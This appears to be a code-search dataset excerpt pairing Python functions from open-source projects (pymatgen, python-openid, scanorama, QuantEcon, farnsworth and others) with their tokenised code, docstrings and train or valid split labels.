def show(self, frame): """ Show an array of pixels on the window. Args: frame (numpy.ndarray): the frame to show on the window Returns: None """ # check that the frame has the correct dimensions if len(frame.shape) != 3: raise ValueError('frame should have shape with only 3 dimensions') # open the window if it isn't open already if not self.is_open: self.open() # prepare the window for the next frame self._window.clear() self._window.switch_to() self._window.dispatch_events() # create an image data object image = ImageData( frame.shape[1], frame.shape[0], 'RGB', frame.tobytes(), pitch=frame.shape[1]*-3 ) # send the image to the window image.blit(0, 0, width=self._window.width, height=self._window.height) self._window.flip()
[ "def", "show", "(", "self", ",", "frame", ")", ":", "# check that the frame has the correct dimensions", "if", "len", "(", "frame", ".", "shape", ")", "!=", "3", ":", "raise", "ValueError", "(", "'frame should have shape with only 3 dimensions'", ")", "# open the wind...
Show an array of pixels on the window. Args: frame (numpy.ndarray): the frame to show on the window Returns: None
[ "Show", "an", "array", "of", "pixels", "on", "the", "window", "." ]
python
train
materialsproject/pymatgen
pymatgen/util/convergence.py
https://github.com/materialsproject/pymatgen/blob/4ca558cf72f8d5f8a1f21dfdfc0181a971c186da/pymatgen/util/convergence.py#L325-L357
def multi_curve_fit(xs, ys, verbose): """ fit multiple functions to the x, y data, return the best fit """ #functions = {exponential: p0_exponential, reciprocal: p0_reciprocal, single_reciprocal: p0_single_reciprocal} functions = { exponential: p0_exponential, reciprocal: p0_reciprocal, #single_reciprocal: p0_single_reciprocal, simple_reciprocal: p0_simple_reciprocal, simple_2reciprocal: p0_simple_2reciprocal, simple_4reciprocal: p0_simple_4reciprocal, simple_5reciprocal: p0_simple_5reciprocal } from scipy.optimize import curve_fit fit_results = {} best = ['', np.inf] for function in functions: try: weights = get_weights(xs, ys) popt, pcov = curve_fit(function, xs, ys, functions[function](xs, ys), maxfev=8000, sigma=weights) pcov = [] m = measure(function, xs, ys, popt, weights) fit_results.update({function: {'measure': m, 'popt': popt, 'pcov': pcov}}) for f in fit_results: if fit_results[f]['measure'] <= best[1]: best = f, fit_results[f]['measure'] if verbose: print(str(function), m) except RuntimeError: print('no fit found for ', function) return fit_results[best[0]]['popt'], fit_results[best[0]]['pcov'], best
[ "def", "multi_curve_fit", "(", "xs", ",", "ys", ",", "verbose", ")", ":", "#functions = {exponential: p0_exponential, reciprocal: p0_reciprocal, single_reciprocal: p0_single_reciprocal}", "functions", "=", "{", "exponential", ":", "p0_exponential", ",", "reciprocal", ":", "p0...
fit multiple functions to the x, y data, return the best fit
[ "fit", "multiple", "functions", "to", "the", "x", "y", "data", "return", "the", "best", "fit" ]
python
train
brocade/pynos
pynos/versions/ver_7/ver_7_1_0/yang/brocade_vswitch.py
https://github.com/brocade/pynos/blob/bd8a34e98f322de3fc06750827d8bbc3a0c00380/pynos/versions/ver_7/ver_7_1_0/yang/brocade_vswitch.py#L402-L414
def get_vnetwork_dvpgs_output_vnetwork_dvpgs_datacenter(self, **kwargs): """Auto Generated Code """ config = ET.Element("config") get_vnetwork_dvpgs = ET.Element("get_vnetwork_dvpgs") config = get_vnetwork_dvpgs output = ET.SubElement(get_vnetwork_dvpgs, "output") vnetwork_dvpgs = ET.SubElement(output, "vnetwork-dvpgs") datacenter = ET.SubElement(vnetwork_dvpgs, "datacenter") datacenter.text = kwargs.pop('datacenter') callback = kwargs.pop('callback', self._callback) return callback(config)
[ "def", "get_vnetwork_dvpgs_output_vnetwork_dvpgs_datacenter", "(", "self", ",", "*", "*", "kwargs", ")", ":", "config", "=", "ET", ".", "Element", "(", "\"config\"", ")", "get_vnetwork_dvpgs", "=", "ET", ".", "Element", "(", "\"get_vnetwork_dvpgs\"", ")", "config"...
Auto Generated Code
[ "Auto", "Generated", "Code" ]
python
train
horazont/aioxmpp
aioxmpp/pep/service.py
https://github.com/horazont/aioxmpp/blob/22a68e5e1d23f2a4dee470092adbd4672f9ef061/aioxmpp/pep/service.py#L326-L338
def close(self): """ Unclaim the PEP node and unregister the registered features. It is not necessary to call close if this claim is managed by :class:`~aioxmpp.pep.register_pep_node`. """ if self._closed: return self._closed = True self._pep_service._unclaim(self.node_namespace) self._unregister()
[ "def", "close", "(", "self", ")", ":", "if", "self", ".", "_closed", ":", "return", "self", ".", "_closed", "=", "True", "self", ".", "_pep_service", ".", "_unclaim", "(", "self", ".", "node_namespace", ")", "self", ".", "_unregister", "(", ")" ]
Unclaim the PEP node and unregister the registered features. It is not necessary to call close if this claim is managed by :class:`~aioxmpp.pep.register_pep_node`.
[ "Unclaim", "the", "PEP", "node", "and", "unregister", "the", "registered", "features", "." ]
python
train
openid/python-openid
openid/consumer/consumer.py
https://github.com/openid/python-openid/blob/f7e13536f0d1828d3cef5ae7a7b55cabadff37fc/openid/consumer/consumer.py#L687-L699
def _checkSetupNeeded(self, message): """Check an id_res message to see if it is a checkid_immediate cancel response. @raises SetupNeededError: if it is a checkid_immediate cancellation """ # In OpenID 1, we check to see if this is a cancel from # immediate mode by the presence of the user_setup_url # parameter. if message.isOpenID1(): user_setup_url = message.getArg(OPENID1_NS, 'user_setup_url') if user_setup_url is not None: raise SetupNeededError(user_setup_url)
[ "def", "_checkSetupNeeded", "(", "self", ",", "message", ")", ":", "# In OpenID 1, we check to see if this is a cancel from", "# immediate mode by the presence of the user_setup_url", "# parameter.", "if", "message", ".", "isOpenID1", "(", ")", ":", "user_setup_url", "=", "me...
Check an id_res message to see if it is a checkid_immediate cancel response. @raises SetupNeededError: if it is a checkid_immediate cancellation
[ "Check", "an", "id_res", "message", "to", "see", "if", "it", "is", "a", "checkid_immediate", "cancel", "response", "." ]
python
train
brianhie/scanorama
scanorama/scanorama.py
https://github.com/brianhie/scanorama/blob/57aafac87d07a8d682f57450165dd07f066ebb3c/scanorama/scanorama.py#L114-L169
def integrate(datasets_full, genes_list, batch_size=BATCH_SIZE, verbose=VERBOSE, ds_names=None, dimred=DIMRED, approx=APPROX, sigma=SIGMA, alpha=ALPHA, knn=KNN, geosketch=False, geosketch_max=20000, n_iter=1, union=False, hvg=None): """Integrate a list of data sets. Parameters ---------- datasets_full : `list` of `scipy.sparse.csr_matrix` or of `numpy.ndarray` Data sets to integrate and correct. genes_list: `list` of `list` of `string` List of genes for each data set. batch_size: `int`, optional (default: `5000`) The batch size used in the alignment vector computation. Useful when correcting very large (>100k samples) data sets. Set to large value that runs within available memory. verbose: `bool` or `int`, optional (default: 2) When `True` or not equal to 0, prints logging output. ds_names: `list` of `string`, optional When `verbose=True`, reports data set names in logging output. dimred: `int`, optional (default: 100) Dimensionality of integrated embedding. approx: `bool`, optional (default: `True`) Use approximate nearest neighbors, greatly speeds up matching runtime. sigma: `float`, optional (default: 15) Correction smoothing parameter on Gaussian kernel. alpha: `float`, optional (default: 0.10) Alignment score minimum cutoff. knn: `int`, optional (default: 20) Number of nearest neighbors to use for matching. hvg: `int`, optional (default: None) Use this number of top highly variable genes based on dispersion. Returns ------- integrated, genes Returns a two-tuple containing a list of `numpy.ndarray` with integrated low dimensional embeddings and a single list of genes containing the intersection of inputted genes. """ datasets_full = check_datasets(datasets_full) datasets, genes = merge_datasets(datasets_full, genes_list, ds_names=ds_names, union=union) datasets_dimred, genes = process_data(datasets, genes, hvg=hvg, dimred=dimred) for _ in range(n_iter): datasets_dimred = assemble( datasets_dimred, # Assemble in low dimensional space. 
verbose=verbose, knn=knn, sigma=sigma, approx=approx, alpha=alpha, ds_names=ds_names, batch_size=batch_size, geosketch=geosketch, geosketch_max=geosketch_max, ) return datasets_dimred, genes
[ "def", "integrate", "(", "datasets_full", ",", "genes_list", ",", "batch_size", "=", "BATCH_SIZE", ",", "verbose", "=", "VERBOSE", ",", "ds_names", "=", "None", ",", "dimred", "=", "DIMRED", ",", "approx", "=", "APPROX", ",", "sigma", "=", "SIGMA", ",", ...
Integrate a list of data sets. Parameters ---------- datasets_full : `list` of `scipy.sparse.csr_matrix` or of `numpy.ndarray` Data sets to integrate and correct. genes_list: `list` of `list` of `string` List of genes for each data set. batch_size: `int`, optional (default: `5000`) The batch size used in the alignment vector computation. Useful when correcting very large (>100k samples) data sets. Set to large value that runs within available memory. verbose: `bool` or `int`, optional (default: 2) When `True` or not equal to 0, prints logging output. ds_names: `list` of `string`, optional When `verbose=True`, reports data set names in logging output. dimred: `int`, optional (default: 100) Dimensionality of integrated embedding. approx: `bool`, optional (default: `True`) Use approximate nearest neighbors, greatly speeds up matching runtime. sigma: `float`, optional (default: 15) Correction smoothing parameter on Gaussian kernel. alpha: `float`, optional (default: 0.10) Alignment score minimum cutoff. knn: `int`, optional (default: 20) Number of nearest neighbors to use for matching. hvg: `int`, optional (default: None) Use this number of top highly variable genes based on dispersion. Returns ------- integrated, genes Returns a two-tuple containing a list of `numpy.ndarray` with integrated low dimensional embeddings and a single list of genes containing the intersection of inputted genes.
[ "Integrate", "a", "list", "of", "data", "sets", "." ]
python
train
aio-libs/aioredis
aioredis/pubsub.py
https://github.com/aio-libs/aioredis/blob/e8c33e39558d4cc91cf70dde490d8b330c97dc2e/aioredis/pubsub.py#L313-L324
def iter(self, *, encoding=None, decoder=None): """Returns async iterator. Usage example: >>> async for ch, msg in mpsc.iter(): ... print(ch, msg) """ return _IterHelper(self, is_active=lambda r: not r._queue.exhausted, encoding=encoding, decoder=decoder)
[ "def", "iter", "(", "self", ",", "*", ",", "encoding", "=", "None", ",", "decoder", "=", "None", ")", ":", "return", "_IterHelper", "(", "self", ",", "is_active", "=", "lambda", "r", ":", "not", "r", ".", "_queue", ".", "exhausted", ",", "encoding", ...
Returns async iterator. Usage example: >>> async for ch, msg in mpsc.iter(): ... print(ch, msg)
[ "Returns", "async", "iterator", "." ]
python
train
reingart/pyafipws
utils.py
https://github.com/reingart/pyafipws/blob/ee87cfe4ac12285ab431df5fec257f103042d1ab/utils.py#L903-L919
def abrir_conf(config_file, debug=False): "Abrir el archivo de configuración (usar primer parámetro como ruta)" # en principio, usar el nombre de archivo predeterminado # si se pasa el archivo de configuración por parámetro, confirmar que exista # y descartar que sea una opción if len(sys.argv)>1: if os.path.splitext(sys.argv[1])[1].lower() == ".ini": config_file = sys.argv.pop(1) if not os.path.exists(config_file) or not os.path.isfile(config_file): warnings.warn("Archivo de configuracion %s invalido" % config_file) if debug: print "CONFIG_FILE:", config_file config = SafeConfigParser() config.read(config_file) return config
[ "def", "abrir_conf", "(", "config_file", ",", "debug", "=", "False", ")", ":", "# en principio, usar el nombre de archivo predeterminado", "# si se pasa el archivo de configuración por parámetro, confirmar que exista", "# y descartar que sea una opción", "if", "len", "(", "sys", "....
Abrir el archivo de configuración (usar primer parámetro como ruta)
[ "Abrir", "el", "archivo", "de", "configuración", "(", "usar", "primer", "parámetro", "como", "ruta", ")" ]
python
train
numenta/nupic
src/nupic/algorithms/fdrutilities.py
https://github.com/numenta/nupic/blob/5922fafffdccc8812e72b3324965ad2f7d4bbdad/src/nupic/algorithms/fdrutilities.py#L65-L94
def generateCoincMatrix(nCoinc=10, length=500, activity=50): """ Generate a coincidence matrix. This is used to generate random inputs to the temporal learner and to compare the predicted output against. It generates a matrix of nCoinc rows, each row has length 'length' and has a total of 'activity' bits on. Parameters: ----------------------------------------------- nCoinc: the number of rows to generate length: the length of each row activity: the number of ones to put into each row. """ coincMatrix0 = SM32(int(nCoinc), int(length)) theOnes = numpy.array([1.0] * activity, dtype=numpy.float32) for rowIdx in xrange(nCoinc): coinc = numpy.array(random.sample(xrange(length), activity), dtype=numpy.uint32) coinc.sort() coincMatrix0.setRowFromSparse(rowIdx, coinc, theOnes) # This is the right code to use, it's faster, but it derails the unit # testing of the pooling for now. coincMatrix = SM32(int(nCoinc), int(length)) coincMatrix.initializeWithFixedNNZR(activity) return coincMatrix0
[ "def", "generateCoincMatrix", "(", "nCoinc", "=", "10", ",", "length", "=", "500", ",", "activity", "=", "50", ")", ":", "coincMatrix0", "=", "SM32", "(", "int", "(", "nCoinc", ")", ",", "int", "(", "length", ")", ")", "theOnes", "=", "numpy", ".", ...
Generate a coincidence matrix. This is used to generate random inputs to the temporal learner and to compare the predicted output against. It generates a matrix of nCoinc rows, each row has length 'length' and has a total of 'activity' bits on. Parameters: ----------------------------------------------- nCoinc: the number of rows to generate length: the length of each row activity: the number of ones to put into each row.
[ "Generate", "a", "coincidence", "matrix", ".", "This", "is", "used", "to", "generate", "random", "inputs", "to", "the", "temporal", "learner", "and", "to", "compare", "the", "predicted", "output", "against", "." ]
python
valid
timothydmorton/isochrones
isochrones/starmodel.py
https://github.com/timothydmorton/isochrones/blob/d84495573044c66db2fd6b959fe69e370757ea14/isochrones/starmodel.py#L559-L577
def mnest_basename(self): """Full path to basename """ if not hasattr(self, '_mnest_basename'): s = self.labelstring if s=='0_0': s = 'single' elif s=='0_0-0_1': s = 'binary' elif s=='0_0-0_1-0_2': s = 'triple' s = '{}-{}'.format(self.ic.name, s) self._mnest_basename = os.path.join('chains', s+'-') if os.path.isabs(self._mnest_basename): return self._mnest_basename else: return os.path.join(self.directory, self._mnest_basename)
[ "def", "mnest_basename", "(", "self", ")", ":", "if", "not", "hasattr", "(", "self", ",", "'_mnest_basename'", ")", ":", "s", "=", "self", ".", "labelstring", "if", "s", "==", "'0_0'", ":", "s", "=", "'single'", "elif", "s", "==", "'0_0-0_1'", ":", "...
Full path to basename
[ "Full", "path", "to", "basename" ]
python
train
getfleety/coralillo
coralillo/fields.py
https://github.com/getfleety/coralillo/blob/9cac101738a0fa7c1106f129604c00ef703370e1/coralillo/fields.py#L173-L177
def delete(self, redis): ''' Deletes this field's value from the databse. Should be implemented in special cases ''' value = getattr(self.obj, self.name) redis.srem(self.key() + ':' + value, self.obj.id)
[ "def", "delete", "(", "self", ",", "redis", ")", ":", "value", "=", "getattr", "(", "self", ".", "obj", ",", "self", ".", "name", ")", "redis", ".", "srem", "(", "self", ".", "key", "(", ")", "+", "':'", "+", "value", ",", "self", ".", "obj", ...
Deletes this field's value from the databse. Should be implemented in special cases
[ "Deletes", "this", "field", "s", "value", "from", "the", "databse", ".", "Should", "be", "implemented", "in", "special", "cases" ]
python
train
ClericPy/torequests
torequests/utils.py
https://github.com/ClericPy/torequests/blob/1793261688d7a47e1c3a0830d83f8552f5e3e5d9/torequests/utils.py#L622-L633
def search(self, string, default=None): """Use re.search to find the result :rtype: list""" default = default if default else [] result = [item[1] for item in self.container if item[0].search(string)] if self.ensure_mapping: assert len(result) < 2, "%s matches more than one pattern: %s" % ( string, result, ) return result if result else default
[ "def", "search", "(", "self", ",", "string", ",", "default", "=", "None", ")", ":", "default", "=", "default", "if", "default", "else", "[", "]", "result", "=", "[", "item", "[", "1", "]", "for", "item", "in", "self", ".", "container", "if", "item"...
Use re.search to find the result :rtype: list
[ "Use", "re", ".", "search", "to", "find", "the", "result" ]
python
train
Neurosim-lab/netpyne
doc/source/code/HHCellFile.py
https://github.com/Neurosim-lab/netpyne/blob/edb67b5098b2e7923d55010ded59ad1bf75c0f18/doc/source/code/HHCellFile.py#L66-L78
def defineBiophysics(self): """Assign the membrane properties across the cell.""" # Insert active Hodgkin-Huxley current in the soma self.soma.insert('hh') self.soma.gnabar_hh = 0.12 # Sodium conductance in S/cm2 self.soma.gkbar_hh = 0.036 # Potassium conductance in S/cm2 self.soma.gl_hh = 0.003 # Leak conductance in S/cm2 self.soma.el_hh = -70 # Reversal potential in mV self.dend.insert('pas') self.dend.g_pas = 0.001 # Passive conductance in S/cm2 self.dend.e_pas = -65 # Leak reversal potential mV self.dend.nseg = 1000
[ "def", "defineBiophysics", "(", "self", ")", ":", "# Insert active Hodgkin-Huxley current in the soma", "self", ".", "soma", ".", "insert", "(", "'hh'", ")", "self", ".", "soma", ".", "gnabar_hh", "=", "0.12", "# Sodium conductance in S/cm2", "self", ".", "soma", ...
Assign the membrane properties across the cell.
[ "Assign", "the", "membrane", "properties", "across", "the", "cell", "." ]
python
train
noahbenson/neuropythy
neuropythy/util/core.py
https://github.com/noahbenson/neuropythy/blob/b588889f6db36ddb9602ae4a72c1c0d3f41586b2/neuropythy/util/core.py#L819-L845
def tangent(x, null=(-np.inf, np.inf), rtol=default_rtol, atol=default_atol): ''' tangent(x) is equivalent to tan(x) except that it also works on sparse arrays. The optional argument null (default, (-numpy.inf, numpy.inf)) may be specified to indicate what value(s) should be assigned when x == -pi/2 or -pi/2. If only one number is given, then it is used for both values; otherwise the first value corresponds to -pi/2 and the second to pi/2. A value of x is considered to be equal to one of these valids based on numpy.isclose. The optional arguments rtol and atol are passed along to isclose. If null is None, then no replacement is performed. ''' if sps.issparse(x): x = x.copy() x.data = tangent(x.data, null=null, rtol=rtol, atol=atol) return x else: x = np.asarray(x) if rtol is None: rtol = default_rtol if atol is None: atol = default_atol try: (nln,nlp) = null except Exception: (nln,nlp) = (null,null) x = np.mod(x + pi, tau) - pi ii = None if nln is None else np.where(np.isclose(x, neghpi, rtol=rtol, atol=atol)) jj = None if nlp is None else np.where(np.isclose(x, hpi, rtol=rtol, atol=atol)) x = np.tan(x) if ii: x[ii] = nln if jj: x[jj] = nlp return x
[ "def", "tangent", "(", "x", ",", "null", "=", "(", "-", "np", ".", "inf", ",", "np", ".", "inf", ")", ",", "rtol", "=", "default_rtol", ",", "atol", "=", "default_atol", ")", ":", "if", "sps", ".", "issparse", "(", "x", ")", ":", "x", "=", "x...
tangent(x) is equivalent to tan(x) except that it also works on sparse arrays. The optional argument null (default, (-numpy.inf, numpy.inf)) may be specified to indicate what value(s) should be assigned when x == -pi/2 or -pi/2. If only one number is given, then it is used for both values; otherwise the first value corresponds to -pi/2 and the second to pi/2. A value of x is considered to be equal to one of these valids based on numpy.isclose. The optional arguments rtol and atol are passed along to isclose. If null is None, then no replacement is performed.
[ "tangent", "(", "x", ")", "is", "equivalent", "to", "tan", "(", "x", ")", "except", "that", "it", "also", "works", "on", "sparse", "arrays", "." ]
python
train
open-homeautomation/pknx
knxip/ip.py
https://github.com/open-homeautomation/pknx/blob/a8aed8271563923c447aa330ba7c1c2927286f7a/knxip/ip.py#L129-L170
def from_body(cls, cemi): """Create a new CEMIMessage initialized from the given CEMI data.""" # TODO: check that length matches message = cls() message.code = cemi[0] offset = cemi[1] message.ctl1 = cemi[2 + offset] message.ctl2 = cemi[3 + offset] message.src_addr = cemi[4 + offset] * 256 + cemi[5 + offset] message.dst_addr = cemi[6 + offset] * 256 + cemi[7 + offset] message.mpdu_len = cemi[8 + offset] tpci_apci = cemi[9 + offset] * 256 + cemi[10 + offset] apci = tpci_apci & 0x3ff # for APCI codes see KNX Standard 03/03/07 Application layer # table Application Layer control field if apci & 0x080: # Group write message.cmd = CEMIMessage.CMD_GROUP_WRITE elif apci == 0: message.cmd = CEMIMessage.CMD_GROUP_READ elif apci & 0x40: message.cmd = CEMIMessage.CMD_GROUP_RESPONSE else: message.cmd = CEMIMessage.CMD_UNKNOWN apdu = cemi[10 + offset:] if len(apdu) != message.mpdu_len: raise KNXException( "APDU LEN should be {} but is {}".format( message.mpdu_len, len(apdu))) if len(apdu) == 1: message.data = [apci & 0x2f] else: message.data = cemi[11 + offset:] return message
[ "def", "from_body", "(", "cls", ",", "cemi", ")", ":", "# TODO: check that length matches", "message", "=", "cls", "(", ")", "message", ".", "code", "=", "cemi", "[", "0", "]", "offset", "=", "cemi", "[", "1", "]", "message", ".", "ctl1", "=", "cemi", ...
Create a new CEMIMessage initialized from the given CEMI data.
[ "Create", "a", "new", "CEMIMessage", "initialized", "from", "the", "given", "CEMI", "data", "." ]
python
train
simoninireland/epyc
epyc/clusterlab.py
https://github.com/simoninireland/epyc/blob/b3b61007741a0ab3de64df89070a6f30de8ec268/epyc/clusterlab.py#L351-L365
def cancelPendingResultsFor( self, params ): """Cancel any results pending for experiments at the given point in the parameter space. :param params: the experimental parameters""" # grab the result job ids jobs = self.pendingResultsFor(params) if len(jobs) > 0: # abort in the cluster self._abortJobs(jobs) # cancel in the notebook self.notebook().cancelPendingResultsFor(params)
[ "def", "cancelPendingResultsFor", "(", "self", ",", "params", ")", ":", "# grab the result job ids", "jobs", "=", "self", ".", "pendingResultsFor", "(", "params", ")", "if", "len", "(", "jobs", ")", ">", "0", ":", "# abort in the cluster", "self", ".", "_abort...
Cancel any results pending for experiments at the given point in the parameter space. :param params: the experimental parameters
[ "Cancel", "any", "results", "pending", "for", "experiments", "at", "the", "given", "point", "in", "the", "parameter", "space", "." ]
python
train
QuantEcon/QuantEcon.py
quantecon/lss.py
https://github.com/QuantEcon/QuantEcon.py/blob/26a66c552f2a73967d7efb6e1f4b4c4985a12643/quantecon/lss.py#L160-L200
def simulate(self, ts_length=100, random_state=None): r""" Simulate a time series of length ts_length, first drawing .. math:: x_0 \sim N(\mu_0, \Sigma_0) Parameters ---------- ts_length : scalar(int), optional(default=100) The length of the simulation random_state : int or np.random.RandomState, optional Random seed (integer) or np.random.RandomState instance to set the initial state of the random number generator for reproducibility. If None, a randomly initialized RandomState is used. Returns ------- x : array_like(float) An n x ts_length array, where the t-th column is :math:`x_t` y : array_like(float) A k x ts_length array, where the t-th column is :math:`y_t` """ random_state = check_random_state(random_state) x0 = multivariate_normal(self.mu_0.flatten(), self.Sigma_0) w = random_state.randn(self.m, ts_length-1) v = self.C.dot(w) # Multiply each w_t by C to get v_t = C w_t # == simulate time series == # x = simulate_linear_model(self.A, x0, v, ts_length) if self.H is not None: v = random_state.randn(self.l, ts_length) y = self.G.dot(x) + self.H.dot(v) else: y = self.G.dot(x) return x, y
[ "def", "simulate", "(", "self", ",", "ts_length", "=", "100", ",", "random_state", "=", "None", ")", ":", "random_state", "=", "check_random_state", "(", "random_state", ")", "x0", "=", "multivariate_normal", "(", "self", ".", "mu_0", ".", "flatten", "(", ...
r""" Simulate a time series of length ts_length, first drawing .. math:: x_0 \sim N(\mu_0, \Sigma_0) Parameters ---------- ts_length : scalar(int), optional(default=100) The length of the simulation random_state : int or np.random.RandomState, optional Random seed (integer) or np.random.RandomState instance to set the initial state of the random number generator for reproducibility. If None, a randomly initialized RandomState is used. Returns ------- x : array_like(float) An n x ts_length array, where the t-th column is :math:`x_t` y : array_like(float) A k x ts_length array, where the t-th column is :math:`y_t`
[ "r", "Simulate", "a", "time", "series", "of", "length", "ts_length", "first", "drawing" ]
python
train
phaethon/kamene
kamene/plist.py
https://github.com/phaethon/kamene/blob/11d4064844f4f68ac5d7546f5633ac7d02082914/kamene/plist.py#L479-L490
def summary(self, prn=None, lfilter=None): """prints a summary of each SndRcv packet pair prn: function to apply to each packet pair instead of lambda s, r: "%s ==> %s" % (s.summary(),r.summary()) lfilter: truth function to apply to each packet pair to decide whether it will be displayed""" for s, r in self.res: if lfilter is not None: if not lfilter(s, r): continue if prn is None: print(self._elt2sum((s, r))) else: print(prn(s, r))
[ "def", "summary", "(", "self", ",", "prn", "=", "None", ",", "lfilter", "=", "None", ")", ":", "for", "s", ",", "r", "in", "self", ".", "res", ":", "if", "lfilter", "is", "not", "None", ":", "if", "not", "lfilter", "(", "s", ",", "r", ")", ":...
prints a summary of each SndRcv packet pair prn: function to apply to each packet pair instead of lambda s, r: "%s ==> %s" % (s.summary(),r.summary()) lfilter: truth function to apply to each packet pair to decide whether it will be displayed
[ "prints", "a", "summary", "of", "each", "SndRcv", "packet", "pair", "prn", ":", "function", "to", "apply", "to", "each", "packet", "pair", "instead", "of", "lambda", "s", "r", ":", "%s", "==", ">", "%s", "%", "(", "s", ".", "summary", "()", "r", "....
python
train
hthiery/python-fritzhome
pyfritzhome/fritzhome.py
https://github.com/hthiery/python-fritzhome/blob/c74bd178d08a305028f316f7da35202da3526f61/pyfritzhome/fritzhome.py#L492-L503
def get_hkr_state(self): """Get the thermostate state.""" self.update() try: return { 126.5: 'off', 127.0: 'on', self.eco_temperature: 'eco', self.comfort_temperature: 'comfort' }[self.target_temperature] except KeyError: return 'manual'
[ "def", "get_hkr_state", "(", "self", ")", ":", "self", ".", "update", "(", ")", "try", ":", "return", "{", "126.5", ":", "'off'", ",", "127.0", ":", "'on'", ",", "self", ".", "eco_temperature", ":", "'eco'", ",", "self", ".", "comfort_temperature", ":"...
Get the thermostate state.
[ "Get", "the", "thermostate", "state", "." ]
python
train
chaoss/grimoirelab-sortinghat
sortinghat/cmd/withdraw.py
https://github.com/chaoss/grimoirelab-sortinghat/blob/391cd37a75fea26311dc6908bc1c953c540a8e04/sortinghat/cmd/withdraw.py#L97-L125
def withdraw(self, uuid, organization, from_date=None, to_date=None): """Withdraw a unique identity from an organization. This method removes all the enrollments between the unique identity, identified by <uuid>, and <organization>. Both entities must exist on the registry before being deleted. When a period of time is given using either <from_date> and <to_date> parameters, it will remove those enrollments which their periods fall between these two parameters. Default values for these dates are '1900-01-01' and '2100-01-01'. :param uuid: unique identifier :param organization: name of the organization :param from_date: date when the enrollment starts :param to_date: date when the enrollment ends """ # Empty or None values for uuid and organizations are not allowed, # so do nothing if not uuid or not organization: return CMD_SUCCESS try: api.delete_enrollment(self.db, uuid, organization, from_date, to_date) except (NotFoundError, InvalidValueError) as e: self.error(str(e)) return e.code return CMD_SUCCESS
[ "def", "withdraw", "(", "self", ",", "uuid", ",", "organization", ",", "from_date", "=", "None", ",", "to_date", "=", "None", ")", ":", "# Empty or None values for uuid and organizations are not allowed,", "# so do nothing", "if", "not", "uuid", "or", "not", "organi...
Withdraw a unique identity from an organization. This method removes all the enrollments between the unique identity, identified by <uuid>, and <organization>. Both entities must exist on the registry before being deleted. When a period of time is given using either <from_date> and <to_date> parameters, it will remove those enrollments which their periods fall between these two parameters. Default values for these dates are '1900-01-01' and '2100-01-01'. :param uuid: unique identifier :param organization: name of the organization :param from_date: date when the enrollment starts :param to_date: date when the enrollment ends
[ "Withdraw", "a", "unique", "identity", "from", "an", "organization", "." ]
python
train
knagra/farnsworth
workshift/views.py
https://github.com/knagra/farnsworth/blob/1b6589f0d9fea154f0a1e2231ed906764ed26d26/workshift/views.py#L62-L192
def add_workshift_context(request):
    """
    Add workshift variables to all dictionaries passed to templates.

    Returns a context dict containing the current/selected semester, the
    requester's workshift profile and standing, semester progress numbers,
    and the upcoming shifts paired with the shifts happening now.
    """
    # Anonymous users get no workshift context at all.
    if not request.user.is_authenticated():
        return {}
    # No semesters defined yet: workshift is effectively disabled.
    if Semester.objects.count() < 1:
        return {
            "WORKSHIFT_ENABLED": False,
        }
    # Current semester is for navbar notifications
    try:
        current_semester = Semester.objects.get(current=True)
    except Semester.DoesNotExist:
        current_semester = None
    except Semester.MultipleObjectsReturned:
        # Several semesters are flagged current; fall back to the newest one
        # and warn the user, including workshift manager contact emails.
        current_semester = Semester.objects.filter(
            current=True,
        ).latest("start_date")
        workshift_emails = []
        for pos in Manager.objects.filter(workshift_manager=True, active=True):
            if pos.email:
                workshift_emails.append(pos.email)
            elif pos.incumbent.email_visible and pos.incumbent.user.email:
                workshift_emails.append(pos.incumbent.user.email)
        if workshift_emails:
            workshift_email_str = " ({})".format(
                ", ".join(
                    "<a href=\"mailto:{0}\">{0}</a>".format(i)
                    for i in workshift_emails
                ),
            )
        else:
            workshift_email_str = ""
        messages.add_message(
            request,
            messages.WARNING,
            MESSAGES["MULTIPLE_CURRENT_SEMESTERS"].format(
                admin_email=settings.ADMINS[0][1],
                workshift_emails=workshift_email_str,
            ),
        )
    today = localtime(now()).date()
    # Defaults used when there is no current semester / profile.
    days_passed = None
    total_days = None
    semester_percentage = None
    standing = None
    happening_now = None
    workshift_profile = None
    if current_semester:
        # number of days passed in this semester
        days_passed = (today - current_semester.start_date).days
        # total number of days in this semester
        total_days = (
            current_semester.end_date - current_semester.start_date
        ).days
        semester_percentage = round((days_passed / total_days) * 100, 2)
    # Semester is for populating the current page
    try:
        semester = request.semester
    except AttributeError:
        semester = current_semester
    try:
        workshift_profile = WorkshiftProfile.objects.get(
            semester=semester,
            user=request.user,
        )
    except WorkshiftProfile.DoesNotExist:
        workshift_profile = None
    workshift_manager = utils.can_manage(request.user, semester=semester)
    # Shifts assigned to this profile within the next two days.
    upcoming_shifts = WorkshiftInstance.objects.filter(
        workshifter=workshift_profile,
        closed=False,
        date__gte=today,
        date__lte=today + timedelta(days=2),
    )
    # TODO: Add a fudge factor of an hour to this?
    time = localtime(now()).time()
    happening_now = []
    for shift in upcoming_shifts:
        # Week-long shifts are always considered "happening now".
        if shift.week_long:
            happening_now.append(shift)
            continue
        if shift.date != today:
            continue
        # Open-ended start: happening until end_time (or all day if no end).
        if shift.start_time is None:
            if shift.end_time is not None:
                if time < shift.end_time:
                    happening_now.append(shift)
            else:
                happening_now.append(shift)
            continue
        # Open-ended end: happening from start_time onward.
        if shift.end_time is None:
            if shift.start_time is not None:
                if time > shift.start_time:
                    happening_now.append(shift)
            else:
                happening_now.append(shift)
            continue
        # Bounded shift: happening while strictly inside its window.
        if time > shift.start_time and time < shift.end_time:
            happening_now.append(shift)
    if workshift_profile:
        try:
            standing = workshift_profile.pool_hours.get(
                pool__is_primary=True,
            ).standing
        except (PoolHours.DoesNotExist, PoolHours.MultipleObjectsReturned):
            pass
    # NOTE(review): happening_now is a filtered subset of upcoming_shifts, so
    # this zip can pair unrelated items — confirm how the template consumes it.
    return {
        "WORKSHIFT_ENABLED": True,
        "SEMESTER": semester,
        "CURRENT_SEMESTER": current_semester,
        "WORKSHIFT_MANAGER": workshift_manager,
        "WORKSHIFT_PROFILE": workshift_profile,
        "STANDING": standing,
        "DAYS_PASSED": days_passed,
        "TOTAL_DAYS": total_days,
        "SEMESTER_PERCENTAGE": semester_percentage,
        "UPCOMING_SHIFTS": zip(upcoming_shifts, happening_now),
    }
[ "def", "add_workshift_context", "(", "request", ")", ":", "if", "not", "request", ".", "user", ".", "is_authenticated", "(", ")", ":", "return", "{", "}", "if", "Semester", ".", "objects", ".", "count", "(", ")", "<", "1", ":", "return", "{", "\"WORKSH...
Add workshift variables to all dictionaries passed to templates.
